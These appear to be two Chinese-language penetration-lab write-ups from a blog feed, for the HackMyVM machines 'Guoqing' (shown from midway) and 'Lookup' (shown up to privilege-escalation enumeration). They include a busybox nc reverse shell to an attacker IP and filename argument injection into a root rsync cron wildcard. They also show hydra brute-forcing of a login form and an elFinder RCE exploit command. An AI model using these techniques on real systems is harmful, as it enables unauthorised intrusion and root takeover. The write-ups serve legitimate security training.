   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded


╔══════════╣ Protections
═╣ AppArmor enabled? .............. You do not have enough privilege to read the profile set.
apparmor module is loaded.
═╣ AppArmor profile? .............. unconfined
═╣ is linuxONE? ................... s390x Not Found
═╣ grsecurity present? ............ grsecurity Not Found
═╣ PaX bins present? .............. PaX Not Found       
═╣ Execshield enabled? ............ Execshield Not Found
═╣ SELinux enabled? ............... sestatus Not Found  
═╣ Seccomp enabled? ............... disabled            
═╣ User namespace? ................ enabled
═╣ Cgroup2 enabled? ............... enabled
═╣ Is ASLR enabled? ............... Yes
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... Yes (oracle)        

╔══════════╣ Kernel Modules Information
══╣ Kernel modules with weak perms?                     
                                                        
══╣ Kernel modules loadable? 
Modules can be loaded                                   



                                   ╔═══════════╗
═══════════════════════════════════╣ Container ╠═══════════════════════════════════                             
                                   ╚═══════════╝        
╔══════════╣ Container related tools present (if any):
/usr/sbin/apparmor_parser                               
/usr/bin/nsenter
/usr/bin/unshare
/usr/sbin/chroot
/usr/sbin/capsh
/usr/sbin/setcap
/usr/sbin/getcap

╔══════════╣ Container details
═╣ Is this a container? ........... No                  
═╣ Any running containers? ........ No

wechat

hyh@Guoqing:~/.weechat$ cat ~/.weechat/irc.conf
#
# weechat -- irc.conf
#
# WARNING: It is NOT recommended to edit this file by hand,
# especially if WeeChat is running.
#
# Use /set or similar command to change settings in WeeChat.
#
# For more info, see: https://weechat.org/doc/quickstart
#

[look]
buffer_open_before_autojoin = on
buffer_open_before_join = off
buffer_switch_autojoin = on
buffer_switch_join = on
color_nicks_in_names = off
color_nicks_in_nicklist = off
color_nicks_in_server_messages = on
color_pv_nick_like_channel = on
ctcp_time_format = "%a, %d %b %Y %T %z"
display_away = local
display_ctcp_blocked = on
display_ctcp_reply = on
display_ctcp_unknown = on
display_host_join = on
display_host_join_local = on
display_host_quit = on
display_join_message = "329,332,333,366"
display_old_topic = on
display_pv_away_once = on
display_pv_back = on
display_pv_warning_address = off
highlight_channel = "$nick"
highlight_pv = "$nick"
highlight_server = "$nick"
highlight_tags_restrict = "irc_privmsg,irc_notice"
item_channel_modes_hide_args = "k"
item_display_server = buffer_plugin
item_nick_modes = on
item_nick_prefix = on
join_auto_add_chantype = off
msgbuffer_fallback = current
new_channel_position = none
new_pv_position = none
nick_completion_smart = speakers
nick_mode = prefix
nick_mode_empty = off
nicks_hide_password = "nickserv"
notice_as_pv = auto
notice_welcome_redirect = on
notice_welcome_tags = ""
notify_tags_ison = "notify_message"
notify_tags_whois = "notify_message"
part_closes_buffer = off
pv_buffer = independent
pv_tags = "notify_private"
raw_messages = 256
server_buffer = merge_with_core
smart_filter = on
smart_filter_account = on
smart_filter_chghost = on
smart_filter_delay = 5
smart_filter_join = on
smart_filter_join_unmask = 30
smart_filter_mode = "+"
smart_filter_nick = on
smart_filter_quit = on
temporary_servers = off
topic_strip_colors = off

[color]
input_nick = lightcyan
item_channel_modes = default
item_lag_counting = default
item_lag_finished = yellow
item_nick_modes = default
message_account = cyan
message_chghost = brown
message_join = green
message_kick = red
message_quit = red
mirc_remap = "1,-1:darkgray"
nick_prefixes = "y:lightred;q:lightred;a:lightcyan;o:lightgreen;h:lightmagenta;v:yellow;*:lightblue"
notice = green
reason_kick = default
reason_quit = default
topic_current = default
topic_new = white
topic_old = default

[network]
autoreconnect_delay_growing = 2
autoreconnect_delay_max = 600
ban_mask_default = "*!$ident@$host"
colors_receive = on
colors_send = on
lag_check = 60
lag_max = 1800
lag_min_show = 500
lag_reconnect = 300
lag_refresh_interval = 1
notify_check_ison = 1
notify_check_whois = 5
sasl_fail_unavailable = on
send_unknown_commands = off
whois_double_nick = off

[msgbuffer]

[ctcp]

[ignore]

[server_default]
addresses = ""
anti_flood_prio_high = 2
anti_flood_prio_low = 2
autoconnect = off
autojoin = ""
autoreconnect = on
autoreconnect_delay = 10
autorejoin = off
autorejoin_delay = 30
away_check = 0
away_check_max_nicks = 25
capabilities = ""
charset_message = message
command = ""
command_delay = 0
connection_timeout = 60
ipv6 = on
local_hostname = ""
msg_kick = ""
msg_part = "WeeChat ${info:version}"
msg_quit = "WeeChat ${info:version}"
nicks = "hyh,hyh1,hyh2,hyh3,hyh4"
nicks_alternate = on
notify = ""
password = ""
proxy = ""
realname = ""
sasl_fail = continue
sasl_key = ""
sasl_mechanism = plain
sasl_password = ""
sasl_timeout = 15
sasl_username = ""
split_msg_max_length = 512
ssl = off
ssl_cert = ""
ssl_dhkey_size = 2048
ssl_fingerprint = ""
ssl_password = ""
ssl_priorities = "NORMAL:-VERS-SSL3.0"
ssl_verify = on
usermode = ""
username = "hyh"

[server]


hyh@Guoqing:~/.weechat$ cat ~/.weechat/sec.conf
#
# weechat -- sec.conf
#
# WARNING: It is NOT recommended to edit this file by hand,
# especially if WeeChat is running.
#
# Use /set or similar command to change settings in WeeChat.
#
# For more info, see: https://weechat.org/doc/quickstart
#

[crypt]
cipher = aes256
hash_algo = sha256
passphrase_file = ""
salt = on

[data]


hyh@Guoqing:~/.weechat$ cd ~/.weechat/logs
hyh@Guoqing:~/.weechat/logs$ ls -lah
total 12K
drwx------ 2 hyh hyh 4.0K Jan 17 07:31 .
drwxr-xr-x 8 hyh hyh 4.0K Jan 17 07:33 ..
-rw-r--r-- 1 hyh hyh 2.9K Jan 17 07:35 core.weechat.weechatlog
hyh@Guoqin

hyh@Guoqing:~/.weechat/logs$ ls -lah
total 12K
drwx------ 2 hyh hyh 4.0K Jan 17 07:31 .
drwxr-xr-x 8 hyh hyh 4.0K Jan 17 07:33 ..
-rw-r--r-- 1 hyh hyh 2.9K Jan 17 07:35 core.weechat.weechatlog


hyh@Guoqing:~/.weechat/logs$ cat core.weechat.weechatlog 
2026-01-17 07:31:59             New key binding (context "default"): meta2-1;5P => /bar scroll buflist * -100%
2026-01-17 07:31:59             New key binding (context "default"): meta2-1;5Q => /bar scroll buflist * +100%
2026-01-17 07:31:59             New key binding (context "default"): meta-meta-OQ => /bar scroll buflist * e
2026-01-17 07:31:59             New key binding (context "default"): meta2-1;3Q => /bar scroll buflist * e
2026-01-17 07:31:59             New key binding (context "default"): meta2-1;3P => /bar scroll buflist * b
2026-01-17 07:31:59             New key binding (context "default"): meta-meta-OP => /bar scroll buflist * b
2026-01-17 07:31:59             New key binding (context "default"): meta-B => /buflist toggle
2026-01-17 07:31:59             New key binding (context "default"): meta-OQ => /bar scroll buflist * +100%
2026-01-17 07:31:59             New key binding (context "default"): meta-OP => /bar scroll buflist * -100%
2026-01-17 07:31:59             New key binding (context "default"): meta-meta2-12~ => /bar scroll buflist * e
2026-01-17 07:31:59             New key binding (context "default"): meta-meta2-11~ => /bar scroll buflist * b
2026-01-17 07:31:59             New key binding (context "default"): meta2-12^ => /bar scroll buflist * +100%
2026-01-17 07:31:59             New key binding (context "default"): meta2-12~ => /bar scroll buflist * +100%
2026-01-17 07:31:59             New key binding (context "default"): meta2-11^ => /bar scroll buflist * -100%
2026-01-17 07:31:59             New key binding (context "default"): meta2-11~ => /bar scroll buflist * -100%
2026-01-17 07:31:59             Plugins loaded: alias, buflist, charset, exec, fifo, fset, irc, logger, perl, python, relay, ruby, script, spell, trigger, xfer
2026-01-17 07:32:45     =!=     You can not write text in this buffer
2026-01-17 07:32:48     =!=     You can not write text in this buffer
2026-01-17 07:32:55     =!=     You can not write text in this buffer
2026-01-17 07:33:33     =!=     Error: WeeChat main buffer can't be closed
2026-01-17 07:33:44             fifo: pipe closed
2026-01-17 07:33:49             Plugins loaded: alias, buflist, charset, exec, fifo, fset, irc, logger, perl, python, relay, ruby, script, spell, trigger, xfer
2026-01-17 07:34:28     =!=     irc: unable to add temporary server "127.0.0.1/6667" because the addition of temporary servers with command /connect is currently disabled
2026-01-17 07:34:28     =!=     irc: if you want to add a standard server, use the command "/server add" (see /help server); if you really want to add a temporary server (NOT SAVED), turn on the option irc.look.temporary_servers
2026-01-17 07:34:44     =!=     irc: unable to add temporary server "127.0.0.1/7000" because the addition of temporary servers with command /connect is currently disabled
2026-01-17 07:34:44     =!=     irc: if you want to add a standard server, use the command "/server add" (see /help server); if you really want to add a temporary server (NOT SAVED), turn on the option irc.look.temporary_servers
2026-01-17 07:34:49     =!=     irc: command "list" must be executed on irc buffer (server, channel or private)

hyh@Guoqing:~/.weechat/logs$ ls ~/.weechat/python
autoload
hyh@Guoqing:~/.weechat/logs$ cd ~/.weechat/python
hyh@Guoqing:~/.weechat/python$ cd autoload/
hyh@Guoqing:~/.weechat/python/autoload$ ls
hyh@Guoqing:~/.weechat/python/autoload$ ls -al
total 8
drwxr-xr-x 2 hyh hyh 4096 Jan 17 07:31 .
drwxr-xr-x 3 hyh hyh 4096 Jan 17 07:31 ..
hyh@Guoqing:~/.weechat/python/autoload$

1️⃣ `irc.conf` —— 没有任何服务器配置

2️⃣ `sec.conf` —— 空数据区（最关键的否定证据）

3️⃣ `logs/` —— 只有 core 日志，没有 irc 日志

4️⃣ `python/autoload/` 是空的

/usr/local/bin/calc-prorate

hyh@Guoqing:~$ find /usr/local/bin -type f -executable -ls 2>/dev/null
   286861      4 -rwxr-xr-x   1 root     root          248 Apr  1  2025 /usr/local/bin/calc-prorate
hyh@Guoqing:~$ cat /usr/local/bin/calc-prorate
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from tempora import calculate_prorated_values
if __name__ == '__main__':
    sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
    sys.exit(calculate_prorated_values())
hyh@Guoqing:~$

1️⃣ 权限不对

-rwxr-xr-x 1 root root

无 SUID

无 capability

普通 root-owned 可执行文件

2️⃣ 代码本身“无状态、无输入”

from tempora import calculate_prorated_values

sys.exit(calculate_prorated_values())

不接收外部参数

不读文件

不执行 shell

不涉及用户

👉 这是一个 APT/系统遗留工具，不是 CTF 点。

segfault

segfault 是 Segmentation Fault 的缩写。
当程序尝试访问 它无权访问的内存（比如读写未分配的地址或只读段）时，操作系统会报这个错误。
通常表现为：

Segmentation fault (core dumped)

发生原因：
访问空指针 (NULL)
越界访问数组
使用已经释放的内存（悬空指针）
栈溢出
对应的信号编号是 SIGSEGV（信号 11）。

3306

DB_USER = admin
DB_PASS = toddishandsome
DB_NAME = login_system

mysql -u admin -p
# 密码：toddishandsome
试了下
里面没翻出来啥也没办法提权

三个用户名

hyh@Guoqing:/home/segfault$ cat name1.txt 
sublarge
hyh@Guoqing:/home/segfault$ cat name2.txt 
bamuwe
hyh@Guoqing:/home/segfault$ cat name3.txt 
LingM

复现

唉，难受，看了wp才知道原来密码是segfaultno1

上传pspy查看监控

2026/01/18 00:40:01 CMD: UID=0     PID=1368   | /usr/sbin/CRON -f 
2026/01/18 00:40:01 CMD: UID=0     PID=1369   | /usr/sbin/CRON -f 
2026/01/18 00:40:01 CMD: UID=0     PID=1370   | /bin/sh -c cd /home/segfault && 
rsync -t *.txt Guoqing:/tmp/backup/ 
2026/01/18 00:40:01 CMD: UID=0     PID=1371   | rsync -t name1.txt name2.txt 
name3.txt Guoqing:/tmp/backup/ 
2026/01/18 00:40:01 CMD: UID=0     PID=1372   | sshd: /usr/sbin/sshd -D 
[listener] 0 of 10-100 startups 
2026/01/18 00:40:01 CMD: UID=0     PID=1373   | sshd: [accepted]

rsync -t name1.txt name2.txt name3.txt Guoqing:/tmp/backup/

反弹shell

不能用bash

#!/bin/sh
busybox nc 192.168.0.106 4444 -e /bash/sh

获得shell

segfault@Guoqing:~$ echo '#!/bin/sh' >> hh.txt
segfault@Guoqing:~$ echo 'busybox nc 192.168.0.106 4444-e /bin/sh' >> hh.txt
segfault@Guoqing:~$ chmod +x hh.txt 
segfault@Guoqing:~$ echo "" > '--rsh=sh hh.txt'

2026/01/18 00:59:01 CMD: UID=0     PID=1515   | /usr/sbin/CRON -f 
2026/01/18 00:59:01 CMD: UID=0     PID=1516   | /bin/sh -c cd /home/segfault && 
rsync -t *.txt Guoqing:/tmp/backup/ 
2026/01/18 00:59:01 CMD: UID=0     PID=1517   | rsync -t --rsh=sh hh.txt -e sh 
hh.txt hh.txt name1.txt name2.txt name3.txt Guoqing:/tmp/backup/ 
2026/01/18 00:59:01 CMD: UID=0     PID=1518   | sh hh.txt Guoqing rsync --server 
-te.LsfxCIvu . /tmp/backup/ 
2026/01/18 00:59:01 CMD: UID=0     PID=1519   | /bin/sh

┌──(root㉿xhhui)-[/usr/share/pspy]
└─# nc -lvnp 6666
listening on [any] 6666 ...
id
connect to [192.168.56.247] from (UNKNOWN) [192.168.56.170] 44252
uid=0(root) gid=0(root) groups=0(root)

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/qq-group/guoqing/

HMV-Lookup

呼啸山庄 — Sat, 17 Jan 2026 00:00:00 GMT

信息收集

IP定位

┌──(web)─(root㉿kali)-[/home/kali]
└─# arp-scan -l | grep "08:00:27"

192.168.0.103   08:00:27:61:e7:ab       (Unknown)

rustscan扫描

┌──(web)─(root㉿kali)-[/home/kali]
└─# rustscan -a 192.168.0.103 -- -A
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Open ports, closed hearts.

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 192.168.0.103:22
Open 192.168.0.103:80

Nmap scan report for 192.168.0.103
Host is up, received arp-response (0.00041s latency).
Scanned at 2026-01-16 21:30:16 EST for 7s

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMc4hLykriw3nBOsKHJK1Y6eauB8OllfLLlztbB4tu4c9cO8qyOXSfZaCcb92uq/Y3u02PPHWq2yXOLPler1AFGVhuSfIpokEnT2jgQzKL63uJMZtoFzL3RW8DAzunrHhi/nQqo8sw7wDCiIN9s4PDrAXmP6YXQ5ekK30om9kd5jHG6xJ+/gIThU4ODr/pHAqr28bSpuHQdgphSjmeShDMg8wu8Kk/B0bL2oEvVxaNNWYWc1qHzdgjV5HPtq6z3MEsLYzSiwxcjDJ+EnL564tJqej6R69mjII1uHStkrmewzpiYTBRdgi9A3Yb+x8NxervECFhUR2MoR1zD+0UJbRA2v1LQaGg9oYnYXNq3Lc5c4aXz638wAUtLtw2SwTvPxDrlCmDVtUhQFDhyFOu9bSmPY0oGH5To8niazWcTsCZlx2tpQLhF/gS3jP/fVw+H6Eyz/yge3RYeyTv3ehV6vXHAGuQLvkqhT6QS21PLzvM7bCqmo1YIqHfT2DLi7jZxdk=
|   256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJNL/iO8JI5DrcvPDFlmqtX/lzemir7W+WegC7hpoYpkPES6q+0/p4B2CgDD0Xr1AgUmLkUhe2+mIJ9odtlWW30=
|   256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFG/Wi4PUTjReEdk2K4aFMi8WzesipJ0bp0iI0FM8AfE
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://lookup.hmv
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:61:E7:AB (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/16%OT=22%CT=%CU=34239%PV=Y%DS=1%DC=D%G=N%M=080027
OS:%TM=696AF43F%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10A%TI=Z%CI=Z%II
OS:=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7
OS:%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%
OS:W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S
OS:=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%R
OS:D=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=
OS:0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U
OS:1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DF
OS:I=N%T=40%CD=S)

Uptime guess: 27.477 days (since Sat Dec 20 10:03:10 2025)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.41 ms 192.168.0.103

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:30
Completed NSE at 21:30, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:30
Completed NSE at 21:30, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:30
Completed NSE at 21:30, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.00 seconds
           Raw packets sent: 25 (1.894KB) | Rcvd: 17 (1.366KB)

添加hosts

192.168.0.103 lookup.hmv

目录扫描

┌──(web)─(root㉿kali)-[/home/kali/Desktop/tools/RunasCs]
└─# gobuster dir -u http://lookup.hmv -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x php,txt,html,zip,db,bak,js,yaml -t 64
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://lookup.hmv
[+] Method:                  GET
[+] Threads:                 64
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              zip,db,bak,js,yaml,php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 275]
/.php                 (Status: 403) [Size: 275]
/login.php            (Status: 200) [Size: 1]
/index.php            (Status: 200) [Size: 719]
/.html                (Status: 403) [Size: 275]
/.php                 (Status: 403) [Size: 275]
/server-status        (Status: 403) [Size: 275]
Progress: 1985031 / 1985040 (100.00%)
===============================================================
Finished
===============================================================

http://lookup.hmv/index.php

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Login Page</title>
  <link rel="stylesheet" href="styles.css">
</head>
<body>
  <div class="container">
    <form action="login.php" method="post">
      <h2>Login</h2>
      <div class="input-group">
        <label for="username">Username</label>
        <input type="text" id="username" name="username" required>
      </div>
      <div class="input-group">
        <label for="password">Password</label>
        <input type="password" id="password" name="password" required>
      </div>
      <button type="submit">Login</button>
    </form>
  </div>
</body>
</html>

利用失败

尝试sql注入

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# sqlmap -r post --batch                          
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.8.11#stable}
|_ -| . [']     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:57:34 /2026-01-16/

[21:57:34] [INFO] parsing HTTP request from 'post'
[21:57:34] [INFO] testing connection to the target URL
got a refresh intent (redirect like response common to login pages) to 'http://lookup.hmv'. Do you want to apply it from now on? [Y/n] Y
[21:57:34] [INFO] checking if the target is protected by some kind of WAF/IPS
[21:57:34] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS
are you sure that you want to continue with further target testing? [Y/n] Y
[21:57:34] [WARNING] please consider usage of tamper scripts (option '--tamper')
[21:57:34] [INFO] testing if the target URL content is stable
[21:57:35] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'                                                                      
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[21:57:35] [INFO] searching for dynamic content
[21:57:35] [CRITICAL] target URL content appears to be heavily dynamic. sqlmap is going to retry the request(s)
[21:57:35] [WARNING] target URL content appears to be too dynamic. Switching to '--text-only'                                                                             
[21:57:35] [INFO] testing if POST parameter 'username' is dynamic
[21:57:35] [INFO] POST parameter 'username' appears to be dynamic
[21:57:35] [INFO] testing for SQL injection on POST parameter 'username'
[21:57:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:57:35] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[21:57:35] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'                                                      
[21:57:35] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[21:57:35] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'                                                                     
[21:57:35] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[21:57:35] [INFO] testing 'Generic inline queries'
[21:57:35] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[21:57:35] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[21:57:35] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'                                                                                  
[21:57:35] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[21:57:35] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[21:57:35] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[21:57:35] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[21:57:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[21:57:35] [WARNING] POST parameter 'username' does not seem to be injectable
[21:57:35] [INFO] testing if POST parameter 'password' is dynamic
[21:57:35] [INFO] POST parameter 'password' appears to be dynamic
[21:57:35] [INFO] testing for SQL injection on POST parameter 'password'
[21:57:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:57:36] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[21:57:36] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'                                                      
[21:57:36] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[21:57:36] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'                                                                     
[21:57:36] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[21:57:36] [INFO] testing 'Generic inline queries'
[21:57:36] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[21:57:36] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[21:57:36] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'                                                                                  
[21:57:36] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[21:57:36] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[21:57:36] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[21:57:36] [INFO] testing 'Oracle AND time-based blind'
[21:57:36] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[21:57:36] [WARNING] POST parameter 'password' does not seem to be injectable
[21:57:36] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'                                                                      
[21:57:36] [WARNING] your sqlmap version is outdated

[*] ending @ 21:57:36 /2026-01-16/

爆破用户和密码

hydra [选项] <目标> http-post-form "<路径>:<POST数据>:<失败特征>"

http-post-form必须是 3 段，用冒号分隔：

URI : POST数据 : 失败特征

┌──(kali💀kali)-[~/temp/Lookup]
└─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt -f lookup.hmv http-post-form "/login.php:username=^USER^&password=^PASS^:Wrong password" 
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-09-23 05:37:07
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://lookup.hmv:80/login.php:username=^USER^&password=^PASS^:Wrong password
[80][http-post-form] host: lookup.hmv   login: admin   password: password123
[STATUS] attack finished for lookup.hmv (valid pair found)
1 of 1 target successfully completed, 1 valid password found

尝试去看一下这个地址：

┌──(kali💀kali)-[~/temp/Lookup]
└─$ curl http://lookup.hmv/login.php -X POST -d "username=admin&password=aaaa"
Wrong password. Please try again.<br>Redirecting in 3 seconds.                                                                                                                                                                                             
┌──(kali💀kali)-[~/temp/Lookup]
└─$ curl http://lookup.hmv/login.php -X POST -d "username=admin&password=password123"
Wrong username or password. Please try again.<br>Redirecting in 3 seconds.

说明用户名不对，重新爆破一下：

┌──(kali💀kali)-[~/temp/Lookup]
└─$ hydra -p password123 -L /usr/share/wordlists/rockyou.txt -f lookup.hmv http-post-form "/login.php:username=^USER^&password=^PASS^:Wrong username" 
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-09-23 05:40:21
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:14344399/p:1), ~896525 tries per task
[DATA] attacking http-post-form://lookup.hmv:80/login.php:username=^USER^&password=^PASS^:Wrong username
[STATUS] 4455.00 tries/min, 4455 tries in 00:01h, 14339944 to do in 53:39h, 16 active
[80][http-post-form] host: lookup.hmv   login: jose   password: password123
[STATUS] attack finished for lookup.hmv (valid pair found)
1 of 1 target successfully completed, 1 valid password found

登录发现重定向至files.lookup.hmv

添加hosts

192.168.0.103 files.lookup.hmv

files.lookup.hmv

elfinder 漏洞

https://github.com/hadrian3689/elFinder_2.1.47_php_connector_rce

python3 exploit.py -t 'http://files.lookup.hmv/elFinder' -lh 192.168.0.106 -lp 4444

┌──(web)─(root㉿kali)-[/home/kali]
└─# pwncat-cs -lp 4444
/root/.pyenv/versions/3.11.9/envs/web/lib/python3.11/site-packages/zodburi/__init__.py:2: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  from pkg_resources import iter_entry_points
[22:56:17] Welcome to pwncat 🐈!                                                                    __main__.py:164
[22:56:21] received connection from 192.168.0.103:51572                                                  bind.py:84
[22:56:22] 192.168.0.103:51572: registered new host w/ db                                            manager.py:957
(local) pwncat$ back
(remote) www-data@lookup:/var/www/files.lookup.hmv/public_html/elFinder/php$

提权

提权-think

(remote) www-data@lookup:/home/think$ find / -perm -4000 -type f 2>/dev/null
/snap/snapd/19457/usr/lib/snapd/snap-confine
/snap/core20/1950/usr/bin/chfn
/snap/core20/1950/usr/bin/chsh
/snap/core20/1950/usr/bin/gpasswd
